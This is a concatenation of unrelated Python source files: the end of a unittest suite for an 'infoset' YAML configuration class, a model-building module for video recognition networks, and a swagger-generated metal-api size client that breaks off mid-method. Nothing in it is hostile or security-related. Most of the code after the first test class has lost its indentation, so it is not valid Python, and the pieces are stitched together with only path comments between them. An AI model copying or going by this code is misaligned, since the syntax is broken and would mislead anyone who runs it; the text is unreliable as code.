""") % (key, key_value)
        bad_dict = yaml.safe_load(bytes(bad_config, 'utf-8'))

        # Write bad_config to file
        with open(config_file, 'w') as f_handle:
            yaml.dump(bad_dict, f_handle, default_flow_style=True)

        # Create configuration object
        config = configuration.Config()
        with self.assertRaises(SystemExit):
            config.log_level()

        # Cleanup files in temp directories
        _delete_files(directory)
    def test_log_directory(self):
        """Testing method log_directory."""
        # Set the environmental variable for the configuration directory
        directory = tempfile.mkdtemp()
        os.environ['INFOSET_CONFIGDIR'] = directory
        config_file = ('%s/test_config.yaml') % (directory)

        # Testing log_directory with blank key_value (filepath)
        key = ''
        key_value = ''
        bad_config = ("""\
main:
    %s %s
""") % (key, key_value)
        bad_dict = yaml.safe_load(bytes(bad_config, 'utf-8'))
        with open(config_file, 'w') as f_handle:
            yaml.dump(bad_dict, f_handle, default_flow_style=True)

        # Create configuration object
        config = configuration.Config()
        with self.assertRaises(SystemExit):
            config.log_directory()

        # Cleanup files in temp directories
        _delete_files(directory)
    def test_ingest_cache_directory(self):
        """Testing method ingest_cache_directory."""
        # Set the environmental variable for the configuration directory
        directory = tempfile.mkdtemp()
        os.environ['INFOSET_CONFIGDIR'] = directory
        config_file = ('%s/test_config.yaml') % (directory)

        # Testing ingest_cache_directory with blank key_value (filepath)
        key = ''
        key_value = ''
        bad_config = ("""\
main:
    %s %s
""") % (key, key_value)
        bad_dict = yaml.safe_load(bytes(bad_config, 'utf-8'))
        with open(config_file, 'w') as f_handle:
            yaml.dump(bad_dict, f_handle, default_flow_style=True)

        # Create configuration object
        config = configuration.Config()
        with self.assertRaises(SystemExit):
            config.ingest_cache_directory()

        # Cleanup files in temp directories
        _delete_files(directory)
    def test_ingest_pool_size(self):
        """Testing method ingest_pool_size."""
        # Testing ingest_pool_size with the good dictionary:
        # good key and key_value
        result = self.config.ingest_pool_size()
        self.assertEqual(result, 20)
        self.assertEqual(result, self.good_dict['main']['ingest_pool_size'])
    def test_bind_port(self):
        """Testing method bind_port."""
        # Testing bind_port with the good dictionary:
        # good key and key_value
        result = self.config.bind_port()
        self.assertEqual(result, 3000)
        self.assertEqual(result, self.good_dict['main']['bind_port'])

        # Set the environmental variable for the configuration directory
        directory = tempfile.mkdtemp()
        os.environ['INFOSET_CONFIGDIR'] = directory
        config_file = ('%s/test_config.yaml') % (directory)

        # Testing bind_port with blank key and blank key_value
        key = ''
        key_value = ''
        bad_config = ("""\
main:
    %s %s
""") % (key, key_value)
        bad_dict = yaml.safe_load(bytes(bad_config, 'utf-8'))

        # Write bad_config to file
        with open(config_file, 'w') as f_handle:
            yaml.dump(bad_dict, f_handle, default_flow_style=True)

        # Create configuration object
        config = configuration.Config()
        with self.assertRaises(SystemExit):
            config.bind_port()

        # Testing bind_port with good key and blank key_value
        key = 'bind_port:'
        key_value = ''
        bad_config = ("""\
main:
    %s %s
""") % (key, key_value)
        bad_dict = yaml.safe_load(bytes(bad_config, 'utf-8'))

        # Write bad_config to file
        with open(config_file, 'w') as f_handle:
            yaml.dump(bad_dict, f_handle, default_flow_style=True)

        # Create configuration object; bind_port falls back to its default
        config = configuration.Config()
        result = config.bind_port()
        self.assertEqual(result, 6000)

        # Cleanup files in temp directories
        _delete_files(directory)
def test_interval(self):
"""Testing method interval."""
# Testing interval with good_dictionary
# good key value and key_value
result = self.config.interval()
self.assertEqual(result, 300)
self.assertEqual(result, self.good_dict['main']['interval'])
# Set the environment variable for the configuration directory
directory = tempfile.mkdtemp()
os.environ['INFOSET_CONFIGDIR'] = directory
config_file = ('%s/test_config.yaml') % (directory)
# Testing interval with blank key and blank key_value
key = ''
key_value = ''
bad_config = ("""\
main:
%s %s
""") % (key, key_value)
bad_dict = yaml.safe_load(bytes(bad_config, 'utf-8'))
# Write bad_config to file
with open(config_file, 'w') as f_handle:
yaml.dump(bad_dict, f_handle, default_flow_style=True)
# Create configuration object
config = configuration.Config()
with self.assertRaises(SystemExit):
config.interval()
# Testing interval with blank key_value
key = 'interval:'
key_value = ''
bad_config = ("""\
main:
%s %s
""") % (key, key_value)
bad_dict = yaml.safe_load(bytes(bad_config, 'utf-8'))
# Write bad_config to file
with open(config_file, 'w') as f_handle:
yaml.dump(bad_dict, f_handle, default_flow_style=True)
# Create configuration object
config = configuration.Config()
result = config.interval()
self.assertEqual(result, 300)
# Cleanup files in temp directories
_delete_files(directory)
def test_sqlalchemy_pool_size(self):
"""Testing method sqlalchemy_pool_size."""
# Testing sqlalchemy_pool_size with a good dictionary
# good key and key_value
result = self.config.sqlalchemy_pool_size()
self.assertEqual(result, 10)
self.assertEqual(
result, self.good_dict['main']['sqlalchemy_pool_size'])
# Set the environment variable for the configuration directory
directory = tempfile.mkdtemp()
os.environ['INFOSET_CONFIGDIR'] = directory
config_file = ('%s/test_config.yaml') % (directory)
# Testing sqlalchemy_pool_size with blank key and blank key_value
key = ''
key_value = ''
bad_config = ("""\
main:
%s %s
""") % (key, key_value)
bad_dict = yaml.safe_load(bytes(bad_config, 'utf-8'))
# Write bad_config to file
with open(config_file, 'w') as f_handle:
yaml.dump(bad_dict, f_handle, default_flow_style=True)
# Create configuration object
config = configuration.Config()
with self.assertRaises(SystemExit):
config.sqlalchemy_pool_size()
# Testing sqlalchemy_pool_size with good key and blank key_value
key = 'sqlalchemy_pool_size:'
key_value = ''
bad_config = ("""\
main:
%s %s
""") % (key, key_value)
bad_dict = yaml.safe_load(bytes(bad_config, 'utf-8'))
# Write bad_config to file
with open(config_file, 'w') as f_handle:
yaml.dump(bad_dict, f_handle, default_flow_style=True)
# Create configuration object
config = configuration.Config()
result = config.sqlalchemy_pool_size()
self.assertEqual(result, 10)
# Cleanup files in temp directories
_delete_files(directory)
def test_sqlalchemy_max_overflow(self):
"""Testing method sqlalchemy_max_overflow."""
result = self.config.sqlalchemy_max_overflow()
self.assertEqual(result, 10)
self.assertEqual(
result, self.good_dict['main']['sqlalchemy_max_overflow'])
# Set the environment variable for the configuration directory
directory = tempfile.mkdtemp()
os.environ['INFOSET_CONFIGDIR'] = directory
config_file = ('%s/test_config.yaml') % (directory)
# Testing sqlalchemy_max_overflow with blank key and blank key_value
key = ''
key_value = ''
bad_config = ("""\
main:
%s %s
""") % (key, key_value)
bad_dict = yaml.safe_load(bytes(bad_config, 'utf-8'))
# Write bad_config to file
with open(config_file, 'w') as f_handle:
yaml.dump(bad_dict, f_handle, default_flow_style=True)
# Create configuration object
config = configuration.Config()
with self.assertRaises(SystemExit):
config.sqlalchemy_max_overflow()
# Testing sqlalchemy_max_overflow with good key and blank key_value
key = 'sqlalchemy_max_overflow:'
key_value = ''
bad_config = ("""\
main:
%s %s
""") % (key, key_value)
bad_dict = yaml.safe_load(bytes(bad_config, 'utf-8'))
# Write bad_config to file
with open(config_file, 'w') as f_handle:
yaml.dump(bad_dict, f_handle, default_flow_style=True)
# Create configuration object
config = configuration.Config()
result = config.sqlalchemy_max_overflow()
self.assertEqual(result, 10)
# Cleanup files in temp directories
_delete_files(directory)
def test_memcached_port(self):
"""Testing method memcached_port."""
# Testing memcached_port with good_dictionary
# good key and key_value
result = self.config.memcached_port()
self.assertEqual(result, 22122)
self.assertEqual(result, self.good_dict['main']['memcached_port'])
# Set the environment variable for the configuration directory
directory = tempfile.mkdtemp()
os.environ['INFOSET_CONFIGDIR'] = directory
config_file = ('%s/test_config.yaml') % (directory)
# Testing memcached_port with blank key and blank key_value
key = ''
key_value = ''
bad_config = ("""\
main:
%s %s
""") % (key, key_value)
bad_dict = yaml.safe_load(bytes(bad_config, 'utf-8'))
# Write bad_config to file
with open(config_file, 'w') as f_handle:
yaml.dump(bad_dict, f_handle, default_flow_style=True)
# Create configuration object
config = configuration.Config()
with self.assertRaises(SystemExit):
config.memcached_port()
# Testing memcached_port with good key and blank key_value
key = 'memcached_port:'
key_value = ''
bad_config = ("""\
main:
%s %s
""") % (key, key_value)
bad_dict = yaml.safe_load(bytes(bad_config, 'utf-8'))
# Write bad_config to file
with open(config_file, 'w') as f_handle:
yaml.dump(bad_dict, f_handle, default_flow_style=True)
# Create configuration object
config = configuration.Config()
result = config.memcached_port()
self.assertEqual(result, 11211)
# Cleanup files in temp directories
_delete_files(directory)
def test_memcached_hostname(self):
"""Testing method memcached_hostname."""
result = self.config.memcached_hostname()
self.assertEqual(result, 'localhost')
self.assertEqual(result, self.good_dict['main']['memcached_hostname'])
# Set the environment variable for the configuration directory
directory = tempfile.mkdtemp()
os.environ['INFOSET_CONFIGDIR'] = directory
config_file = ('%s/test_config.yaml') % (directory)
# Testing memcached_hostname with blank key and blank key_value
key = ''
key_value = ''
bad_config = ("""\
main:
%s %s
""") % (key, key_value)
bad_dict = yaml.safe_load(bytes(bad_config, 'utf-8'))
# Write bad_config to file
with open(config_file, 'w') as f_handle:
yaml.dump(bad_dict, f_handle, default_flow_style=True)
# Create configuration object
config = configuration.Config()
with self.assertRaises(SystemExit):
config.memcached_hostname()
# Testing memcached_hostname with good key and blank key_value
key = 'memcached_hostname:'
key_value = ''
bad_config = ("""\
main:
%s %s
""") % (key, key_value)
bad_dict = yaml.safe_load(bytes(bad_config, 'utf-8'))
# Write bad_config to file
with open(config_file, 'w') as f_handle:
yaml.dump(bad_dict, f_handle, default_flow_style=True)
# Create configuration object; with a blank value, memcached_hostname defaults to 'localhost'
config = configuration.Config()
result = config.memcached_hostname()
self.assertEqual(result, 'localhost')
# Cleanup files in temp directories
_delete_files(directory)
def test_db_hostname(self):
"""Testing method db_hostname."""
result = self.config.db_hostname()
self.assertEqual(result, 'localhost')
self.assertEqual(result, self.good_dict['main']['db_hostname'])
# Set the environment variable for the configuration directory
directory = tempfile.mkdtemp()
os.environ['INFOSET_CONFIGDIR'] = directory
config_file = ('%s/test_config.yaml') % (directory)
# Testing db_hostname with blank key and blank key_value
key = ''
key_value = ''
bad_config = ("""\
main:
%s %s
""") % (key, key_value)
bad_dict = yaml.safe_load(bytes(bad_config, 'utf-8'))
# Write bad_config to file
with open(config_file, 'w') as f_handle:
yaml.dump(bad_dict, f_handle, default_flow_style=True)
# Create configuration object
config = configuration.Config()
with self.assertRaises(SystemExit):
config.db_hostname()
# Testing db_hostname with good key and blank key_value
key = 'db_hostname:'
key_value = ''
bad_config = ("""\
main:
%s %s
""") % (key, key_value)
bad_dict = yaml.safe_load(bytes(bad_config, 'utf-8'))
# Write bad_config to file
with open(config_file, 'w') as f_handle:
yaml.dump(bad_dict, f_handle, default_flow_style=True)
# Create configuration object
config = configuration.Config()
with self.assertRaises(SystemExit):
config.db_hostname()
# Cleanup files in temp directories
_delete_files(directory)
def test_db_username(self):
"""Testing method db_username."""
result = self.config.db_username()
self.assertEqual(result, 'test_infoset')
self.assertEqual(result, self.good_dict['main']['db_username'])
# Set the environment variable for the configuration directory
directory = tempfile.mkdtemp()
os.environ['INFOSET_CONFIGDIR'] = directory
config_file = ('%s/test_config.yaml') % (directory)
# Testing db_username with blank key and blank key_value
key = ''
key_value = ''
bad_config = ("""\
main:
%s %s
""") % (key, key_value)
bad_dict = yaml.safe_load(bytes(bad_config, 'utf-8'))
# Write bad_config to file
with open(config_file, 'w') as f_handle:
yaml.dump(bad_dict, f_handle, default_flow_style=True)
# Create configuration object
config = configuration.Config()
with self.assertRaises(SystemExit):
config.db_username()
# Testing db_username with good key and blank key_value
key = 'db_username:'
key_value = ''
bad_config = ("""\
main:
%s %s
""") % (key, key_value)
bad_dict = yaml.safe_load(bytes(bad_config, 'utf-8'))
# Write bad_config to file
with open(config_file, 'w') as f_handle:
yaml.dump(bad_dict, f_handle, default_flow_style=True)
# Create configuration object
config = configuration.Config()
with self.assertRaises(SystemExit):
config.db_username()
# Cleanup files in temp directories
_delete_files(directory)
def test_db_password(self):
"""Testing method db_password."""
result = self.config.db_password()
self.assertEqual(result, 'test_B3bFHgxQfsEy86TN')
self.assertEqual(result, self.good_dict['main']['db_password'])
# Set the environment variable for the configuration directory
directory = tempfile.mkdtemp()
os.environ['INFOSET_CONFIGDIR'] = directory
config_file = ('%s/test_config.yaml') % (directory)
# Testing db_password with blank key and blank key_value
key = ''
key_value = ''
bad_config = ("""\
main:
%s %s
""") % (key, key_value)
bad_dict = yaml.safe_load(bytes(bad_config, 'utf-8'))
# Write bad_config to file
with open(config_file, 'w') as f_handle:
yaml.dump(bad_dict, f_handle, default_flow_style=True)
# Create configuration object
config = configuration.Config()
with self.assertRaises(SystemExit):
config.db_password()
# Testing db_password with good key and blank key_value
key = 'db_password:'
key_value = ''
bad_config = ("""\
main:
%s %s
""") % (key, key_value)
bad_dict = yaml.safe_load(bytes(bad_config, 'utf-8'))
# Write bad_config to file
with open(config_file, 'w') as f_handle:
yaml.dump(bad_dict, f_handle, default_flow_style=True)
# Create configuration object
config = configuration.Config()
with self.assertRaises(SystemExit):
config.db_password()
# Cleanup files in temp directories
_delete_files(directory)
def test_db_name(self):
"""Testing method db_name."""
result = self.config.db_name()
self.assertEqual(result, 'test_infoset')
self.assertEqual(result, self.good_dict['main']['db_name'])
# Set the environment variable for the configuration directory
directory = tempfile.mkdtemp()
os.environ['INFOSET_CONFIGDIR'] = directory
config_file = ('%s/test_config.yaml') % (directory)
# Testing db_name with blank key and blank key_value
key = ''
key_value = ''
bad_config = ("""\
main:
%s %s
""") % (key, key_value)
bad_dict = yaml.safe_load(bytes(bad_config, 'utf-8'))
# Write bad_config to file
with open(config_file, 'w') as f_handle:
yaml.dump(bad_dict, f_handle, default_flow_style=True)
# Create configuration object
config = configuration.Config()
with self.assertRaises(SystemExit):
config.db_name()
# Testing db_name with good key and blank key_value
key = 'db_name:'
key_value = ''
bad_config = ("""\
main:
%s %s
""") % (key, key_value)
bad_dict = yaml.safe_load(bytes(bad_config, 'utf-8'))
# Write bad_config to file
with open(config_file, 'w') as f_handle:
yaml.dump(bad_dict, f_handle, default_flow_style=True)
# Create configuration object
config = configuration.Config()
with self.assertRaises(SystemExit):
config.db_name()
# Cleanup files in temp directories
_delete_files(directory)
def _delete_files(directory):
"""Delete all files in directory."""
# Verify that directory exists
if not os.path.isdir(directory):
return
# Cleanup files in temp directories
filenames = [filename for filename in os.listdir(
directory) if os.path.isfile(
os.path.join(directory, filename))]
# Get the full filepath for the cache file and remove filepath
for filename in filenames:
filepath = os.path.join(directory, filename)
os.remove(filepath)
# Remove directory after files are deleted.
os.rmdir(directory)
if __name__ == '__main__':
# Do the unit test
unittest.main()
# two_stream_bert/build.py (bomtorazek/LateTemporalModeling3DCNN, MIT license)
from utils.model_path import rgb_3d_model_path_selection
from two_stream_bert import optimization
import os

import models
import torch
def build_model(args):
modality=args.arch.split('_')[0]
if modality == "rgb":
model_path = rgb_3d_model_path_selection(args.arch)
#model_path = os.path.join(modelLocation,'model_best.pth.tar')
elif modality == "flow":
model_path=''
if "3D" in args.arch:
if 'I3D' in args.arch:
model_path='./weights/flow_imagenet.pth'
elif '3D' in args.arch:
model_path='./weights/Flow_Kinetics_64f.pth'
#model_path = os.path.join(modelLocation,'model_best.pth.tar')
elif modality == "both":
model_path=''
if args.dataset=='ucf101':
print('model path is: %s' %(model_path))
model = models.__dict__[args.arch](modelPath=model_path, num_classes=101,length=args.num_seg)
elif args.dataset=='hmdb51':
print('model path is: %s' %(model_path))
model = models.__dict__[args.arch](modelPath=model_path, num_classes=51, length=args.num_seg)
elif args.dataset=='smtV2':
print('model path is: %s' %(model_path))
model = models.__dict__[args.arch](modelPath=model_path, num_classes=174, length=args.num_seg)
elif args.dataset=='window':
print('model path is: %s' %(model_path))
model = models.__dict__[args.arch](modelPath=model_path, num_classes=3, length=args.num_seg)
elif 'cvpr' in args.dataset: # TODO for semi
print('model path is: %s' %(model_path))
model = models.__dict__[args.arch](modelPath=model_path, num_classes=6, length=args.num_seg)
if torch.cuda.device_count() > 1:
model=torch.nn.DataParallel(model)
model = model.cuda()
return model
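The dataset-to-`num_classes` dispatch that all three builders in this module repeat can be captured in a lookup table; a small sketch of the same mapping (class counts taken from the branches above, with any dataset name containing 'cvpr' mapping to 6):

```python
# Class counts per dataset, mirroring the if/elif chains in this module.
NUM_CLASSES = {'ucf101': 101, 'hmdb51': 51, 'smtV2': 174, 'window': 3}

def num_classes_for(dataset):
    """Resolve the number of classes for a dataset name."""
    if dataset in NUM_CLASSES:
        return NUM_CLASSES[dataset]
    if 'cvpr' in dataset:  # mirrors the substring match used above
        return 6
    raise ValueError('unknown dataset: %s' % dataset)
```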
def build_model_validate(args):
modelLocation="./checkpoint/"+args.dataset+"_"+args.arch+"_split"+str(args.split)
model_path = os.path.join(modelLocation,'model_best.pth.tar')
params = torch.load(model_path)
print(modelLocation)
if args.dataset=='ucf101':
model=models.__dict__[args.arch](modelPath='', num_classes=101,length=args.num_seg)
elif args.dataset=='hmdb51':
model=models.__dict__[args.arch](modelPath='', num_classes=51,length=args.num_seg)
elif args.dataset=='smtV2':
print('model path is: %s' %(model_path))
model = models.__dict__[args.arch](modelPath=model_path, num_classes=174, length=args.num_seg)
elif args.dataset=='window':
print('model path is: %s' %(model_path))
model = models.__dict__[args.arch](modelPath=model_path, num_classes=3, length=args.num_seg)
elif 'cvpr' in args.dataset: # TODO for semi
print('model path is: %s' %(model_path))
model = models.__dict__[args.arch](modelPath=model_path, num_classes=6, length=args.num_seg)
if torch.cuda.device_count() > 1:
model=torch.nn.DataParallel(model)
model.load_state_dict(params['state_dict'])
model.cuda()
model.eval()
return model
def build_model_continue(args):
modelLocation="./checkpoint/"+args.dataset+"_"+args.arch+"_split"+str(args.split)
model_path = os.path.join(modelLocation,'model_best.pth.tar')
params = torch.load(model_path)
print(modelLocation)
if args.dataset=='ucf101':
model=models.__dict__[args.arch](modelPath='', num_classes=101,length=args.num_seg)
elif args.dataset=='hmdb51':
model=models.__dict__[args.arch](modelPath='', num_classes=51,length=args.num_seg)
elif args.dataset=='smtV2':
print('model path is: %s' %(model_path))
model = models.__dict__[args.arch](modelPath=model_path, num_classes=174, length=args.num_seg)
elif args.dataset=='window':
print('model path is: %s' %(model_path))
model = models.__dict__[args.arch](modelPath=model_path, num_classes=3, length=args.num_seg)
elif 'cvpr' in args.dataset: # TODO for semi
print('model path is: %s' %(model_path))
model = models.__dict__[args.arch](modelPath=model_path, num_classes=6, length=args.num_seg)
if torch.cuda.device_count() > 1:
model=torch.nn.DataParallel(model)
model.load_state_dict(params['state_dict'])
model = model.cuda()
optimizer = optimization.get_optimizer(model, args)
optimizer.load_state_dict(params['optimizer'])
startEpoch = params['epoch']
best_acc = params['best_acc1']
return model, startEpoch, optimizer, best_acc
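The checkpoint directory that `build_model_validate` and `build_model_continue` assemble by string concatenation can equivalently be built with `os.path.join`; a minimal sketch (argument values below are illustrative):

```python
import os

def checkpoint_dir(dataset, arch, split):
    """Return the checkpoint directory path used by the loaders above."""
    return os.path.join('.', 'checkpoint', '%s_%s_split%s' % (dataset, arch, split))
```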
# metal_python/api/size_api.py (metal-stack/metal-python, MIT license)
# coding: utf-8
"""
metal-api
API to manage and control plane resources like machines, switches, operating system images, machine sizes, networks, IP addresses and more # noqa: E501
OpenAPI spec version: v0.15.7
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from metal_python.api_client import ApiClient
class SizeApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def create_size(self, body, **kwargs): # noqa: E501
"""create a size. if the given ID already exists a conflict is returned # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_size(body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param V1SizeCreateRequest body: (required)
:return: V1SizeResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.create_size_with_http_info(body, **kwargs) # noqa: E501
else:
(data) = self.create_size_with_http_info(body, **kwargs) # noqa: E501
return data
def create_size_with_http_info(self, body, **kwargs): # noqa: E501
"""create a size. if the given ID already exists a conflict is returned # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_size_with_http_info(body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param V1SizeCreateRequest body: (required)
:return: V1SizeResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_size" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'body' is set
if ('body' not in params or
params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `create_size`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['HMAC', 'jwt'] # noqa: E501
return self.api_client.call_api(
'/v1/size', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1SizeResponse', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_size(self, id, **kwargs): # noqa: E501
"""deletes an size and returns the deleted entity # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_size(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: identifier of the size (required)
:return: V1SizeResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.delete_size_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.delete_size_with_http_info(id, **kwargs) # noqa: E501
return data
def delete_size_with_http_info(self, id, **kwargs): # noqa: E501
"""deletes an size and returns the deleted entity # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_size_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: identifier of the size (required)
:return: V1SizeResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_size" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params or
params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `delete_size`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['HMAC', 'jwt'] # noqa: E501
return self.api_client.call_api(
'/v1/size/{id}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1SizeResponse', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def find_size(self, id, **kwargs): # noqa: E501
"""get size by id # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.find_size(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: identifier of the size (required)
:return: V1SizeResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.find_size_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.find_size_with_http_info(id, **kwargs) # noqa: E501
return data
def find_size_with_http_info(self, id, **kwargs): # noqa: E501
"""get size by id # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.find_size_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: identifier of the size (required)
:return: V1SizeResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method find_size" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in params or
params['id'] is None):
raise ValueError("Missing the required parameter `id` when calling `find_size`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['HMAC', 'jwt'] # noqa: E501
return self.api_client.call_api(
'/v1/size/{id}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1SizeResponse', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def from_hardware(self, body, **kwargs): # noqa: E501
"""Searches all sizes for one to match the given hardwarespecs. If nothing is found, a list of entries is returned which describe the constraint which did not match # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.from_hardware(body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param V1MachineHardwareExtended body: (required)
:return: V1SizeMatchingLog
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.from_hardware_with_http_info(body, **kwargs) # noqa: E501
else:
(data) = self.from_hardware_with_http_info(body, **kwargs) # noqa: E501
return data
def from_hardware_with_http_info(self, body, **kwargs): # noqa: E501
"""Searches all sizes for one to match the given hardwarespecs. If nothing is found, a list of entries is returned which describe the constraint which did not match # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.from_hardware_with_http_info(body, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param V1MachineHardwareExtended body: (required)
        :return: V1SizeMatchingLog
                 If the method is called asynchronously,
                 returns the request thread.
        """

        all_params = ['body']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method from_hardware" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'body' is set
        if ('body' not in params or
                params['body'] is None):
            raise ValueError("Missing the required parameter `body` when calling `from_hardware`")  # noqa: E501

        collection_formats = {}

        path_params = {}

        query_params = []

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        if 'body' in params:
            body_params = params['body']
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
            ['application/json'])  # noqa: E501

        # Authentication setting
        auth_settings = ['HMAC', 'jwt']  # noqa: E501

        return self.api_client.call_api(
            '/v1/size/from-hardware', 'POST',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='V1SizeMatchingLog',  # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)

    def list_sizes(self, **kwargs):  # noqa: E501
        """get all sizes  # noqa: E501

        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.list_sizes(async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :return: list[V1SizeResponse]
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('async_req'):
            return self.list_sizes_with_http_info(**kwargs)  # noqa: E501
        else:
            (data) = self.list_sizes_with_http_info(**kwargs)  # noqa: E501
            return data

    def list_sizes_with_http_info(self, **kwargs):  # noqa: E501
        """get all sizes  # noqa: E501

        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.list_sizes_with_http_info(async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :return: list[V1SizeResponse]
                 If the method is called asynchronously,
                 returns the request thread.
        """
        all_params = []  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
